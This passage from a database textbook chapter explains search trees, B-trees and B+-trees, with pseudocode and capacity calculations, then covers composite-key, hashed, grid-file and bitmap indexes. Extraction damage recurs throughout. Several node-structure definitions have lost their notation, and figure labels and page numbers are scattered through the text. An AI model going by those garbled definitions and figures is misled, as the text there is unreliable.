nodes—its child nodes, the child nodes of its child nodes, and so on. A precise recursive definition of a subtree is that it consists of a node n and the subtrees of all the child nodes of n. Figure 7 illustrates a tree data structure. In this figure the root node is A, and its child nodes are B, C, and D. Nodes E, J, C, G, H, and K are leaf nodes. Since the leaf nodes are at different levels of the tree, this tree is called unbalanced. 5This standard definition of the level of a tree node, which we use throughout Section 3, is different from the one we gave for multilevel indexes in Section 2. 651 Indexing Structures for Files A CB Subtree for node B (Nodes E, J, C, G, H, and K are leaf nodes of the tree) Root node (level 0) Nodes at level 1D Nodes at level 2DF I Nodes at level 3I HG J E K Figure 7 A tree data structure that shows an unbalanced tree. In Section 3.1, we introduce search trees and then discuss B-trees, which can be used as dynamic multilevel indexes to guide the search for records in a data file. B-tree nodes are kept between 50 and 100 percent full, and pointers to the data blocks are stored in both internal nodes and leaf nodes of the B-tree structure. In Section 3.2 we discuss B+-trees, a variation of B-trees in which pointers to the data blocks of a file are stored only in leaf nodes, which can lead to fewer levels and higher-capacity indexes. In the DBMSs prevalent in the market today, the common structure used for indexing is B+-trees. 3.1 Search Trees and B-Trees A search tree is a special type of tree that is used to guide the search for a record, given the value of one of the record’s fields. The multilevel indexes discussed in Section 2 can be thought of as a variation of a search tree; each node in the multi- level index can have as many as fo pointers and fo key values, where fo is the index fan-out. The index field values in each node guide us to the next node, until we reach the data file block that contains the required records. By following a pointer, we restrict our search at each level to a subtree of the search tree and ignore all nodes not in this subtree. Search Trees. A search tree is slightly different from a multilevel index. A search tree of order p is a tree such that each node contains at most p − 1 search values and p pointers in the order , where q ≤ p. Each Pi is a
pointer to a child node (or a NULL pointer), and each Ki is a search value from some

652

Indexing Structures for Files

P1

P1

K1 Ki–1

Kq–1 < X X Ki–1 < X < Ki X X < K1 X Pi Ki Kq–1 Pq. . . . . .Figure 8 A node in a search tree with pointers to subtrees below it. 5 3 Tree node pointer Null tree pointer 6 9 7 8 121 Figure 9 A search tree of order p = 3. ordered set of values. All search values are assumed to be unique.6 Figure 8 illus- trates a node in a search tree. Two constraints must hold at all times on the search tree: 1. Within each node, K1 < K2 < ... < Kq−1. 2. For all values X in the subtree pointed at by Pi, we have Ki−1 < X < Ki for 1 < i < q; X < Ki for i = 1; and Ki−1 < X for i = q (see Figure 8). Whenever we search for a value X, we follow the appropriate pointer Pi according to the formulas in condition 2 above. Figure 9 illustrates a search tree of order p = 3 and integer search values. Notice that some of the pointers Pi in a node may be NULL pointers. We can use a search tree as a mechanism to search for records stored in a disk file. The values in the tree can be the values of one of the fields of the file, called the search field (which is the same as the index field if a multilevel index guides the search). Each key value in the tree is associated with a pointer to the record in the data file having that value. Alternatively, the pointer could be to the disk block con- taining that record. The search tree itself can be stored on disk by assigning each tree node to a disk block. When a new record is inserted in the file, we must update the search tree by inserting an entry in the tree containing the search field value of the new record and a pointer to the new record. 6This restriction can be relaxed. If the index is on a nonkey field, duplicate search values may exist and the node structure and the navigation rules for the tree may be modified. 653 Indexing Structures for Files Algorithms are necessary for inserting and deleting search values into and from the search tree while maintaining the preceding two constraints. In general, these algo- rithms do not guarantee that a search tree is balanced, meaning that all of its leaf nodes are at the same level.7 The tree in Figure 7 is not balanced because it has leaf nodes at levels 1, 2, and 3. The goals for balancing a search tree are as follows: ■ To guarantee that nodes are evenly distributed, so that the depth of the tree is minimized for the given set of keys and that the tree does not get skewed with some nodes being at very deep levels ■ To make the search speed uniform, so that the average time to find any ran- dom key is roughly the same While minimizing the number of levels in the tree is one goal, another implicit goal is to make sure that the index tree does not need too much restructuring as records are inserted into and deleted from the main file. Thus we want the nodes to be as full as possible and do not want any nodes to be empty if there are too many deletions. Record deletion may leave some nodes in the tree nearly empty, thus wasting storage space and increasing the number of levels. The B-tree addresses both of these prob- lems by specifying additional constraints on the search tree. B-Trees. The B-tree has additional constraints that ensure that the tree is always balanced and that the space wasted by deletion, if any, never becomes excessive. The algorithms for insertion and deletion, though, become more complex in order to maintain these constraints. Nonetheless, most insertions and deletions are simple processes; they become complicated only under special circumstances—namely, whenever we attempt an insertion into a node that is already full or a deletion from a node that makes it less than half full. More formally, a B-tree of order p, when used as an access structure on a key field to search for records in a data file, can be defined as follows: 1. Each internal node in the B-tree (Figure 10(a)) is of the form , P2, , …, , Pq>

where q ≤ p. Each Pi is a tree pointer—a pointer to another node in the B-
tree. Each Pri is a data pointer

8—a pointer to the record whose search key
field value is equal to Ki (or to the data file block containing that record).

2. Within each node, K1 < K2 < ... < Kq−1. 3. For all search key field values X in the subtree pointed at by Pi (the ith sub- tree, see Figure 10(a)), we have: Ki–1 < X < Ki for 1 < i < q; X < Ki for i = 1; and Ki–1 < X for i = q. 4. Each node has at most p tree pointers. 7The definition of balanced is different for binary trees. Balanced binary trees are known as AVL trees. 8A data pointer is either a block address or a record address; the latter is essentially a block address and a record offset within the block. 654 Indexing Structures for Files X Tree pointer Tree pointer Tree pointer (a) (b) P2 X Data pointer Data pointer Data pointer 5 o 8 Tree node pointero 6 o 7 o 9 o 12 o Data pointer Null tree pointer 1 o 3 o Data pointer P1 Pr1K1 Ki–1 Prq–1Kq–1 X Kq–1 < XKi–1 < X < Ki X < K1 Pi Pq. . . . . .Pri–1 Ki Pri Tree pointer o Figure 10 B-tree structures. (a) A node in a B-tree with q – 1 search values. (b) A B-tree of order p = 3.The values were inserted in the order 8, 5, 1, 7, 3, 12, 9, 6. 5. Each node, except the root and leaf nodes, has at least ⎡(p/2)⎤ tree pointers. The root node has at least two tree pointers unless it is the only node in the tree. 6. A node with q tree pointers, q ≤ p, has q – 1 search key field values (and hence has q – 1 data pointers). 7. All leaf nodes are at the same level. Leaf nodes have the same structure as internal nodes except that all of their tree pointers Pi are NULL. Figure 10(b) illustrates a B-tree of order p = 3. Notice that all search values K in the B-tree are unique because we assumed that the tree is used as an access structure on a key field. If we use a B-tree on a nonkey field, we must change the definition of the file pointers Pri to point to a block—or a cluster of blocks—that contain the point- ers to the file records. This extra level of indirection is similar to option 3, discussed in Section 1.3, for secondary indexes. A B-tree starts with a single root node (which is also a leaf node) at level 0 (zero). Once the root node is full with p – 1 search key values and we attempt to insert another entry in the tree, the root node splits into two nodes at level 1. Only the middle value is kept in the root node, and the rest of the values are split evenly 655 Indexing Structures for Files between the other two nodes. When a nonroot node is full and a new entry is inserted into it, that node is split into two nodes at the same level, and the middle entry is moved to the parent node along with two pointers to the new split nodes. If the parent node is full, it is also split. Splitting can propagate all the way to the root node, creating a new level if the root is split. We do not discuss algorithms for B- trees in detail in this book,9 but we outline search and insertion procedures for B+-trees in the next section. If deletion of a value causes a node to be less than half full, it is combined with its neighboring nodes, and this can also propagate all the way to the root. Hence, dele- tion can reduce the number of tree levels. It has been shown by analysis and simula- tion that, after numerous random insertions and deletions on a B-tree, the nodes are approximately 69 percent full when the number of values in the tree stabilizes. This is also true of B+-trees. If this happens, node splitting and combining will occur only rarely, so insertion and deletion become quite efficient. If the number of values grows, the tree will expand without a problem—although splitting of nodes may occur, so some insertions will take more time. Each B-tree node can have at most p tree pointers, p – 1 data pointers, and p – 1 search key field values (see Figure 10(a)). In general, a B-tree node may contain additional information needed by the algo- rithms that manipulate the tree, such as the number of entries q in the node and a pointer to the parent node. Next, we illustrate how to calculate the number of blocks and levels for a B-tree. Example 4. Suppose that the search field is a nonordering key field, and we con- struct a B-tree on this field with p = 23. Assume that each node of the B-tree is 69 percent full. Each node, on the average, will have p * 0.69 = 23 * 0.69 or approxi- mately 16 pointers and, hence, 15 search key field values. The average fan-out fo = 16. We can start at the root and see how many values and pointers can exist, on the average, at each subsequent level: Root: 1 node 15 key entries 16 pointers Level 1: 16 nodes 240 key entries 256 pointers Level 2: 256 nodes 3840 key entries 4096 pointers Level 3: 4096 nodes 61,440 key entries At each level, we calculated the number of key entries by multiplying the total num- ber of pointers at the previous level by 15, the average number of entries in each node. Hence, for the given block size, pointer size, and search key field size, a two- level B-tree holds 3840 + 240 + 15 = 4095 entries on the average; a three-level B-tree holds 65,535 entries on the average. B-trees are sometimes used as primary file organizations. In this case, whole records are stored within the B-tree nodes rather than just the
entries. This works well for files with a relatively small number of records and a small

9For details on insertion and deletion algorithms for B-trees, consult Ramakrishnan and Gehrke [2003].

656

Indexing Structures for Files

record size. Otherwise, the fan-out and the number of levels become too great to
permit efficient access.

In summary, B-trees provide a multilevel access structure that is a balanced tree
structure in which each node is at least half full. Each node in a B-tree of order p can
have at most p − 1 search values.

3.2 B+-Trees
Most implementations of a dynamic multilevel index use a variation of the B-tree
data structure called a B+-tree. In a B-tree, every value of the search field appears
once at some level in the tree, along with a data pointer. In a B+-tree, data pointers
are stored only at the leaf nodes of the tree; hence, the structure of leaf nodes differs
from the structure of internal nodes. The leaf nodes have an entry for every value of
the search field, along with a data pointer to the record (or to the block that contains
this record) if the search field is a key field. For a nonkey search field, the pointer
points to a block containing pointers to the data file records, creating an extra level
of indirection.

The leaf nodes of the B+-tree are usually linked to provide ordered access on the
search field to the records. These leaf nodes are similar to the first (base) level of an
index. Internal nodes of the B+-tree correspond to the other levels of a multilevel
index. Some search field values from the leaf nodes are repeated in the internal
nodes of the B+-tree to guide the search. The structure of the internal nodes of a B+-
tree of order p (Figure 11(a)) is as follows:

1. Each internal node is of the form

where q ≤ p and each Pi is a tree pointer.
2. Within each internal node, K1 < K2 < ... < Kq−1. 3. For all search field values X in the subtree pointed at by Pi, we have Ki−1 < X ≤ Ki for 1 < i < q; X ≤ Ki for i = 1; and Ki−1 < X for i = q (see Figure 11(a)). 10 4. Each internal node has at most p tree pointers. 5. Each internal node, except the root, has at least ⎡(p/2)⎤ tree pointers. The root node has at least two tree pointers if it is an internal node. 6. An internal node with q pointers, q ≤ p, has q − 1 search field values. The structure of the leaf nodes of a B+-tree of order p (Figure 11(b)) is as follows: 1. Each leaf node is of the form <, , …, , Pnext>

where q ≤ p, each Pri is a data pointer, and Pnext points to the next leaf node of
the B+-tree.

10Our definition follows Knuth (1998). One can define a B+-tree differently by exchanging the < and � symbols (K i−1 � X < Ki; Kq−1 ≤ X), but the principles remain the same. 657 Indexing Structures for Files (b) Pointer to next leaf node in tree Data pointer Data pointer Data pointer Data pointer Pr1K1 Pr2K2 Pri Prq–1 PnextKi Kq–1. . . . . . (a) P1 K1 Ki–1 Kq–1 < X XX X < K1 X Pi Ki Kq–1 Pq. . . . . . Tree pointer Tree pointer Tree pointer Ki–1 < X < Ki Figure 11 The nodes of a B+-tree. (a) Internal node of a B+-tree with q – 1 search values. (b) Leaf node of a B+-tree with q – 1 search values and q – 1 data pointers. 2. Within each leaf node, K1 ≤ K2 ... , Kq−1, q ≤ p. 3. Each Pri is a data pointer that points to the record whose search field value is Ki or to a file block containing the record (or to a block of record pointers that point to records whose search field value is Ki if the search field is not a key). 4. Each leaf node has at least ⎡(p/2)⎤ values. 5. All leaf nodes are at the same level. The pointers in internal nodes are tree pointers to blocks that are tree nodes, whereas the pointers in leaf nodes are data pointers to the data file records or blocks—except for the Pnext pointer, which is a tree pointer to the next leaf node. By starting at the leftmost leaf node, it is possible to traverse leaf nodes as a linked list, using the Pnext pointers. This provides ordered access to the data records on the indexing field. A Pprevious pointer can also be included. For a B +-tree on a nonkey field, an extra level of indirection is needed similar to the one shown in Figure 5, so the Pr pointers are block pointers to blocks that contain a set of record pointers to the actual records in the data file, as discussed in option 3 of Section 1.3. Because entries in the internal nodes of a B+-tree include search values and tree pointers without any data pointers, more entries can be packed into an internal node of a B+-tree than for a similar B-tree. Thus, for the same block (node) size, the order p will be larger for the B+-tree than for the B-tree, as we illustrate in Example 5. This can lead to fewer B+-tree levels, improving search time. Because the structures for internal and for leaf nodes of a B+-tree are different, the order p can be different. We 658 Indexing Structures for Files will use p to denote the order for internal nodes and pleaf to denote the order for leaf nodes, which we define as being the maximum number of data pointers in a leaf node. Example 5. To calculate the order p of a B+-tree, suppose that the search key field is V = 9 bytes long, the block size is B = 512 bytes, a record pointer is Pr = 7 bytes, and a block pointer is P = 6 bytes. An internal node of the B+-tree can have up to p tree pointers and p – 1 search field values; these must fit into a single block. Hence, we have: (p * P) + ((p – 1) * V) ≤ B (P * 6) + ((P − 1) * 9) ≤ 512 (15 * p) ≤ 521 We can choose p to be the largest value satisfying the above inequality, which gives p = 34. This is larger than the value of 23 for the B-tree (it is left to the reader to compute the order of the B-tree assuming same size pointers), resulting in a larger fan-out and more entries in each internal node of a B+-tree than in the correspon- ding B-tree. The leaf nodes of the B+-tree will have the same number of values and pointers, except that the pointers are data pointers and a next pointer. Hence, the order pleaf for the leaf nodes can be calculated as follows: (pleaf * (Pr + V)) + P ≤ B (pleaf * (7 + 9)) + 6 ≤ 512 (16 * pleaf) ≤ 506 It follows that each leaf node can hold up to pleaf = 31 key value/data pointer combi- nations, assuming that the data pointers are record pointers. As with the B-tree, we may need additional information—to implement the inser- tion and deletion algorithms—in each node. This information can include the type of node (internal or leaf), the number of current entries q in the node, and pointers to the parent and sibling nodes. Hence, before we do the above calculations for p and pleaf, we should reduce the block size by the amount of space needed for all such information. The next example illustrates how we can calculate the number of entries in a B+-tree. Example 6. Suppose that we construct a B+-tree on the field in Example 5. To cal- culate the approximate number of entries in the B+-tree, we assume that each node is 69 percent full. On the average, each internal node will have 34 * 0.69 or approxi- mately 23 pointers, and hence 22 values. Each leaf node, on the average, will hold 0.69 * pleaf = 0.69 * 31 or approximately 21 data record pointers. A B +-tree will have the following average number of entries at each level: Root: 1 node 22 key entries 23 pointers Level 1: 23 nodes 506 key entries 529 pointers Level 2: 529 nodes 11,638 key entries 12,167 pointers Leaf level: 12,167 nodes 255,507 data record pointers 659 Indexing Structures for Files For the block size, pointer size, and search field size given above, a three-level B+- tree holds up to 255,507 record pointers, with the average 69 percent occupancy of nodes. Compare this to the 65,535 entries for the corresponding B-tree in Example 4. This is the main reason that B+-trees are preferred to B-trees as indexes to data- base files. Search, Insertion, and Deletion with B+-Trees. Algorithm 2 outlines the pro- cedure using the B+-tree as the access structure to search for a record. Algorithm 3 illustrates the procedure for inserting a record in a file with a B+-tree access struc- ture. These algorithms assume the existence of a key search field, and they must be modified appropriately for the case of a B+-tree on a nonkey field. We illustrate insertion and deletion with an example. Algorithm 2. Searching for a Record with Search Key Field Value K, Using a B+-tree n ← block containing root node of B+-tree; read block n; while (n is not a leaf node of the B+-tree) do begin q ← number of tree pointers in node n; if K ≤ n.K1 (*n.Ki refers to the ith search field value in node n*) then n ← n.P1 (*n.Pi refers to the ith tree pointer in node n*) else if K > n.Kq−1

then n ← n.Pq
else begin

search node n for an entry i such that n.Ki−1 < K ≤n.Ki; n ← n.Pi end; read block n end; search block n for entry (Ki, Pri) with K = Ki; (* search leaf node *) if found then read data file block with address Pri and retrieve record else the record with search field value K is not in the data file; Algorithm 3. Inserting a Record with Search Key Field Value K in a B+-tree of Order p n ← block containing root node of B+-tree; read block n; set stack S to empty; while (n is not a leaf node of the B+-tree) do begin push address of n on stack S; (*stack S holds parent nodes that are needed in case of split*) q ← number of tree pointers in node n; if K ≤n.K1 (*n.Ki refers to the ith search field value in node n*) 660 then n ← n.P1 (*n.Pi refers to the ith tree pointer in node n*) else if K > n.Kq−1

then n ← n.Pq
else begin

search node n for an entry i such that n.Ki−1 < K ≤n.Ki; n ← n.Pi end; read block n end; search block n for entry (Ki,Pri) with K = Ki; (*search leaf node n*) if found then record already in file; cannot insert else (*insert entry in B+-tree to point to record*) begin create entry (K, Pr) where Pr points to the new record; if leaf node n is not full then insert entry (K, Pr) in correct position in leaf node n else begin (*leaf node n is full with pleaf record pointers; is split*) copy n to temp (*temp is an oversize leaf node to hold extra entries*); insert entry (K, Pr) in temp in correct position; (*temp now holds pleaf + 1 entries of the form (Ki, Pri)*) new ← a new empty leaf node for the tree; new.Pnext ← n.Pnext ; j ← ⎡(pleaf + 1)/2 ⎤ ; n ← first j entries in temp (up to entry (Kj, Prj)); n.Pnext ← new; new ← remaining entries in temp; K ← Kj ; (*now we must move (K, new) and insert in parent internal node; however, if parent is full, split may propagate*) finished ← false; repeat if stack S is empty then (*no parent node; new root node is created for the tree*) begin root ← a new empty internal node for the tree; root ← ; finished ← true;
end

else begin
n ← pop stack S;
if internal node n is not full

then
begin (*parent node not full; no split*)
insert (K, new) in correct position in internal node n;
finished ← true
end

else begin (*internal node n is full with p tree pointers;
overflow condition; node is split*)

Indexing Structures for Files

661

Indexing Structures for Files

copy n to temp (*temp is an oversize internal node*);
insert (K, new) in temp in correct position;
(*temp now has p + 1 tree pointers*)
new ← a new empty internal node for the tree;
j ← ⎣((p + 1)/2⎦ ;
n ← entries up to tree pointer Pj in temp;
(*n contains *)
new ← entries from tree pointer Pj+1 in temp;
(*new contains < Pj+1, Kj+1, ..., Kp−1, Pp, Kp, Pp+1 >*)
K ← Kj
(*now we must move (K, new) and insert in parent

internal node*)
end

end
until finished
end;

end;

Figure 12 illustrates insertion of records in a B+-tree of order p = 3 and pleaf = 2.
First, we observe that the root is the only node in the tree, so it is also a leaf node. As
soon as more than one level is created, the tree is divided into internal nodes and
leaf nodes. Notice that every key value must exist at the leaf level, because all data
pointers are at the leaf level. However, only some values exist in internal nodes to
guide the search. Notice also that every value appearing in an internal node also
appears as the rightmost value in the leaf level of the subtree pointed at by the tree
pointer to the left of the value.

When a leaf node is full and a new entry is inserted there, the node overflows and
must be split. The first j = ⎡((pleaf + 1)/2)⎤ entries in the original node are kept
there, and the remaining entries are moved to a new leaf node. The jth search value
is replicated in the parent internal node, and an extra pointer to the new node is cre-
ated in the parent. These must be inserted in the parent node in their correct
sequence. If the parent internal node is full, the new value will cause it to overflow
also, so it must be split. The entries in the internal node up to Pj—the jth tree
pointer after inserting the new value and pointer, where j = ⎣((p + 1)/2)⎦—are kept,
while the jth search value is moved to the parent, not replicated. A new internal
node will hold the entries from Pj+1 to the end of the entries in the node (see
Algorithm 3). This splitting can propagate all the way up to create a new root node
and hence a new level for the B+-tree.

Figure 13 illustrates deletion from a B+-tree. When an entry is deleted, it is always
removed from the leaf level. If it happens to occur in an internal node, it must also
be removed from there. In the latter case, the value to its left in the leaf node must
replace it in the internal node because that value is now the rightmost entry in the
subtree. Deletion may cause underflow by reducing the number of entries in the
leaf node to below the minimum required. In this case, we try to find a sibling leaf
node—a leaf node directly to the left or to the right of the node with underflow—

662

Indexing Structures for Files

5 0 8
Insert 1: overflow (new level)

0

5

1 0 5 0 8 0

5

3 5

5

3

3

8

3 7 8

8

Tree node pointer

Data pointer

Null tree pointerInsert 7

Insert 9

Insert 6: overflow (split, propagates)

Insert 3: overflow
(split)

Insert 12: overflow (split, propagates,
new level)

1 0 5 0 7 0 8 0

1 0 5 0

5 0 12 0

3 0

1 0 3 0

5 01 0 3 0

7 0 8 0

7 0 8 0

12 09 07 0 8 0

5

5

5 01 0 3 0 8 0 12 09 06 0 7 0

Insertion sequence: 8, 5, 1, 7, 3, 12, 9, 6

0

Figure 12
An example of insertion in a B+-tree with p = 3 and pleaf = 2.

663

Indexing Structures for Files

7

1 6

7

1 6 9

Deletion sequence: 5, 12, 9

1 o 5 o 6

Delete 5

o 8 o 9 o 12 o7 o

1 o 6 o 8 o 9 o 12 o7 o

9

7

1 6 8

1 o 6 o 8 o 9 o7 o

Delete 12: underflow
(redistribute)

Delete 9: underflow
(merge with left, redistribute)6

1 7

1 o 6 o 8 o7 o

Figure 13
An example of deletion from a B+-tree.

and redistribute the entries among the node and its sibling so that both are at least
half full; otherwise, the node is merged with its siblings and the number of leaf
nodes is reduced. A common method is to try to redistribute entries with the left
sibling; if this is not possible, an attempt to redistribute with the right sibling is

664

Indexing Structures for Files

made. If this is also not possible, the three nodes are merged into two leaf nodes. In
such a case, underflow may propagate to internal nodes because one fewer tree
pointer and search value are needed. This can propagate and reduce the tree levels.

Notice that implementing the insertion and deletion algorithms may require parent
and sibling pointers for each node, or the use of a stack as in Algorithm 3. Each node
should also include the number of entries in it and its type (leaf or internal).
Another alternative is to implement insertion and deletion as recursive
procedures.11

Variations of B-Trees and B+-Trees. To conclude this section, we briefly men-
tion some variations of B-trees and B+-trees. In some cases, constraint 5 on the B-
tree (or for the internal nodes of the B+–tree, except the root node), which requires
each node to be at least half full, can be changed to require each node to be at least
two-thirds full. In this case the B-tree has been called a B*-tree. In general, some
systems allow the user to choose a fill factor between 0.5 and 1.0, where the latter
means that the B-tree (index) nodes are to be completely full. It is also possible to
specify two fill factors for a B+-tree: one for the leaf level and one for the internal
nodes of the tree. When the index is first constructed, each node is filled up to
approximately the fill factors specified. Some investigators have suggested relaxing
the requirement that a node be half full, and instead allow a node to become com-
pletely empty before merging, to simplify the deletion algorithm. Simulation studies
show that this does not waste too much additional space under randomly distrib-
uted insertions and deletions.

4 Indexes on Multiple Keys
In our discussion so far, we have assumed that the primary or secondary keys on
which files were accessed were single attributes (fields). In many retrieval and
update requests, multiple attributes are involved. If a certain combination of attrib-
utes is used frequently, it is advantageous to set up an access structure to provide
efficient access by a key value that is a combination of those attributes.

For example, consider an EMPLOYEE file containing attributes Dno (department
number), Age, Street, City, Zip_code, Salary and Skill_code, with the key of Ssn (Social
Security number). Consider the query: List the employees in department number 4
whose age is 59. Note that both Dno and Age are nonkey attributes, which means that
a search value for either of these will point to multiple records. The following alter-
native search strategies may be considered:

1. Assuming Dno has an index, but Age does not, access the records having
Dno = 4 using the index, and then select from among them those records that
satisfy Age = 59.

11For more details on insertion and deletion algorithms for B+ trees, consult Ramakrishnan and Gehrke
[2003].

665

Indexing Structures for Files

2. Alternately, if Age is indexed but Dno is not, access the records having Age =
59 using the index, and then select from among them those records that sat-
isfy Dno = 4.

3. If indexes have been created on both Dno and Age, both indexes may be used;
each gives a set of records or a set of pointers (to blocks or records). An inter-
section of these sets of records or pointers yields those records or pointers
that satisfy both conditions.

All of these alternatives eventually give the correct result. However, if the set of
records that meet each condition (Dno = 4 or Age = 59) individually are large, yet
only a few records satisfy the combined condition, then none of the above is an effi-
cient technique for the given search request. A number of possibilities exist that
would treat the combination < Dno, Age> or < Age, Dno> as a search key made up of
multiple attributes. We briefly outline these techniques in the following sections. We
will refer to keys containing multiple attributes as composite keys.

4.1 Ordered Index on Multiple Attributes
All the discussion in this chapter so far still applies if we create an index on a search
key field that is a combination of . The search key is a pair of values <4, 59> in the above example. In general, if an index is created on attributes , the search key values are tuples with n values: .

A lexicographic ordering of these tuple values establishes an order on this compos-
ite search key. For our example, all of the department keys for department number
3 precede those for department number 4. Thus <3, n> precedes <4, m> for any val-
ues of m and n. The ascending key order for keys with Dno = 4 would be <4, 18>, <4, 19>, <4, 20>, and so on. Lexicographic ordering works similarly to ordering of
character strings. An index on a composite key of n attributes works similarly to any
index discussed in this chapter so far.

4.2 Partitioned Hashing
Partitioned hashing is an extension of static external hashing that allows access on
multiple keys. It is suitable only for equality comparisons; range queries are not sup-
ported. In partitioned hashing, for a key consisting of n components, the hash func-
tion is designed to produce a result with n separate hash addresses. The bucket
address is a concatenation of these n addresses. It is then possible to search for the
required composite search key by looking up the appropriate buckets that match the
parts of the address in which we are interested.

For example, consider the composite search key . If Dno and Age are
hashed into a 3-bit and 5-bit address respectively, we get an 8-bit bucket address.
Suppose that Dno = 4 has a hash address ‘100’ and Age = 59 has hash address ‘10101’.
Then to search for the combined search value, Dno = 4 and Age = 59, one goes to
bucket address 100 10101; just to search for all employees with Age = 59, all buckets
(eight of them) will be searched whose addresses are ‘000 10101’, ‘001 10101’, … and

666

Indexing Structures for Files

Linear Scale for Age

EMPLOYEE file Bucket pool

Bucket pool

4

5

3

2
1
0

0 1 2 3 4 5

< 20 21–25 26–30 31–40 41–50 > 50

0 1 2 3 4 5

Dno

Linear scale
for Dno

0 1, 2

3, 4

5

6, 7

8

9, 10

1

2

3

4

5

Figure 14
Example of a grid array on Dno and Age attributes.

so on. An advantage of partitioned hashing is that it can be easily extended to any
number of attributes. The bucket addresses can be designed so that high-order bits
in the addresses correspond to more frequently accessed attributes. Additionally, no
separate access structure needs to be maintained for the individual attributes. The
main drawback of partitioned hashing is that it cannot handle range queries on any
of the component attributes.

4.3 Grid Files
Another alternative is to organize the EMPLOYEE file as a grid file. If we want to
access a file on two keys, say Dno and Age as in our example, we can construct a grid
array with one linear scale (or dimension) for each of the search attributes. Figure
14 shows a grid array for the EMPLOYEE file with one linear scale for Dno and
another for the Age attribute. The scales are made in a way as to achieve a uniform
distribution of that attribute. Thus, in our example, we show that the linear scale for
Dno has Dno = 1, 2 combined as one value 0 on the scale, while Dno = 5 corresponds
to the value 2 on that scale. Similarly, Age is divided into its scale of 0 to 5 by group-
ing ages so as to distribute the employees uniformly by age. The grid array shown
for this file has a total of 36 cells. Each cell points to some bucket address where the
records corresponding to that cell are stored. Figure 14 also shows the assignment of
cells to buckets (only partially).

Thus our request for Dno = 4 and Age = 59 maps into the cell (1, 5) corresponding
to the grid array. The records for this combination will be found in the correspond-
ing bucket. This method is particularly useful for range queries that would map into
a set of cells corresponding to a group of values along the linear scales. If a range
query corresponds to a match on the some of the grid cells, it can be processed by
accessing exactly the buckets for those grid cells. For example, a query for Dno ≤ 5

667

Indexing Structures for Files

and Age > 40 refers to the data in the top bucket shown in Figure 14. The grid file
concept can be applied to any number of search keys. For example, for n search keys,
the grid array would have n dimensions. The grid array thus allows a partitioning of
the file along the dimensions of the search key attributes and provides an access by
combinations of values along those dimensions. Grid files perform well in terms of
reduction in time for multiple key access. However, they represent a space overhead
in terms of the grid array structure. Moreover, with dynamic files, a frequent reor-
ganization of the file adds to the maintenance cost.12

5 Other Types of Indexes

5.1 Hash Indexes
It is also possible to create access structures similar to indexes that are based on
hashing. The hash index is a secondary structure to access the file by using hashing
on a search key other than the one used for the primary data file organization. The
index entries are of the type or , where Pr is a pointer to the record
containing the key, or P is a pointer to the block containing the record for that key.
The index file with these index entries can be organized as a dynamically expand-
able hash file; searching for an entry uses the hash search algorithm on K. Once an
entry is found, the pointer Pr (or P) is used to locate the corresponding record in the
data file. Figure 15 illustrates a hash index on the Emp_id field for a file that has been
stored as a sequential file ordered by Name. The Emp_id is hashed to a bucket num-
ber by using a hashing function: the sum of the digits of Emp_id modulo 10. For
example, to find Emp_id 51024, the hash function results in bucket number 2; that
bucket is accessed first. It contains the index entry < 51024, Pr >; the pointer Pr
leads us to the actual record in the file. In a practical application, there may be thou-
sands of buckets; the bucket number, which may be several bits long, would be sub-
jected to the directory schemes related to dynamic hashing. Other search structures
can also be used as indexes.

5.2 Bitmap Indexes
The bitmap index is another popular data structure that facilitates querying on
multiple keys. Bitmap indexing is used for relations that contain a large number of
rows. It creates an index for one or more columns, and each value or value range in
those columns is indexed. Typically, a bitmap index is created for those columns
that contain a fairly small number of unique values. To build a bitmap index on a set
of records in a relation, the records must be numbered from 0 to n with an id (a
record id or a row id) that can be mapped to a physical address made of a block
number and a record offset within the block.

12Insertion/deletion algorithms for grid files may be found in Nievergelt et al. (1984).

668

Indexing Structures for Files

Bucket 0 Emp_id
. . . . . . . . . .

12676 Marcus M . .

. . . . . . . . . .

13646 Hanson M . .

. . . . . . . . . .

21124 Dunhill M . .

. . . . . . . . . .

23402 Clarke F . .

. . . . . . . . . .

34723 Ferragamo F . .

. . . . . . . . . .

41301 Zara F . .

. . . . . . . . . .

51024 Bass M . .

. . . . . . . . . .

62104 England M . .

. . . . . . . . . .

71221 Abercombe F . .

. . . . . . . . . .

81165 Gucci F . .

. . . . . . . . . .

13646

21124

. . . . .

Lastname Sex . . . . .

Bucket 1

23402

81165

. . . . .

Bucket 2

51024

12676

. . . . .

Bucket 3

62104

71221

. . . . .

Bucket 9

34723

41301

. . . . .

Figure 15
Hash-based indexing.

A bitmap index is built on one particular value of a particular field (the column in a
relation) and is just an array of bits. Consider a bitmap index for the column C and
a value V for that column. For a relation with n rows, it contains n bits. The ith bit is
set to 1 if the row i has the value V for column C; otherwise it is set to a 0. If C con-
tains the valueset with m distinct values, then m bitmap indexes
would be created for that column. Figure 16 shows the relation EMPLOYEE with
columns Emp_id, Lname, Sex, Zipcode, and Salary_grade (with just 8 rows for illustra-
tion) and a bitmap index for the Sex and Zipcode columns. As an example, if the
bitmap for Sex = F, the bits for Row_ids 1, 3, 4, and 7 are set to 1, and the rest of the
bits are set to 0, the bitmap indexes could have the following query applications:

■ For the query C1 = V1 , the corresponding bitmap for value V1 returns the
Row_ids containing the rows that qualify.

669

Indexing Structures for Files

EMPLOYEE

Row_id Emp_id Lname Sex Zipcode Salary_grade
0 51024 Bass M 94040 ..
1 23402 Clarke F 30022 ..
2 62104 England M 19046 ..
3 34723 Ferragamo F 30022 ..
4 81165 Gucci F 19046 ..
5 13646 Hanson M 19046 ..
6 12676 Marcus M 30022 ..
7 41301 Zara F 94040 ..

Bitmap index for Sex

M F
10100110 01011001

Bitmap index for Zipcode

Zipcode 19046 Zipcode 30022 Zipcode 94040
00101100 01010010 10000001

Figure 16
Bitmap indexes for
Sex and Zipcode

■ For the query C1= V1 and C2 = V2 (a multikey search request), the two cor-
responding bitmaps are retrieved and intersected (logically AND-ed) to
yield the set of Row_ids that qualify. In general, k bitvectors can be intersected
to deal with k equality conditions. Complex AND-OR conditions can also be
supported using bitmap indexing.

■ To retrieve a count of rows that qualify for the condition C1 = V1, the “1”
entries in the corresponding bitvector are counted.

■ Queries with negation, such as C1 ¬ = V1, can be handled by applying the
Boolean complement operation on the corresponding bitmap.

Consider the example in Figure 16. To find employees with Sex = F and
Zipcode = 30022, we intersect the bitmaps “01011001” and “01010010” yielding
Row_ids 1 and 3. Employees who do not live in Zipcode = 94040 are obtained by
complementing the bitvector “10000001” and yields Row_ids 1 through 6. In gen-
eral, if we assume uniform distribution of values for a given column, and if one col-
umn has 5 distinct values and another has 10 distinct values, the join condition on
these two can be considered to have a selectivity of 1/50 (=1/5 * 1/10). Hence, only
about 2 percent of the records would actually have to be retrieved. If a column has
